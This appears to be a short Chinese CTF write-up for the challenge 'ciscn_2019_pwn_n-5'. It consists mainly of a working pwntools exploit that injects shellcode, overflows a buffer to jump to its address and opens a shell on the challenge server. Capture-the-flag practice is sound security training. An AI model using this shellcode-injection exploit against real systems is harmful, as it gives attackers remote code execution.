ciscn_2019_pwn_n-5
题目链接:https://www.xuenixiang.com/ctfexercise-competition-420.html因为没有任何防护,直接shellcode
from pwn import *
context(arch='amd64',os='linux')#需要设置context
r=remote('node3.buuoj.cn',28960)
shellcode=asm(shellcraft.sh())
r.recvuntil('tell me your name')
r.sendline(shellcode)
payload='a'*0x28+p64(0x601080)
r.recvuntil('What do you want to say to me?')
r.sendline(payload)
r.interactive()
页:
[1]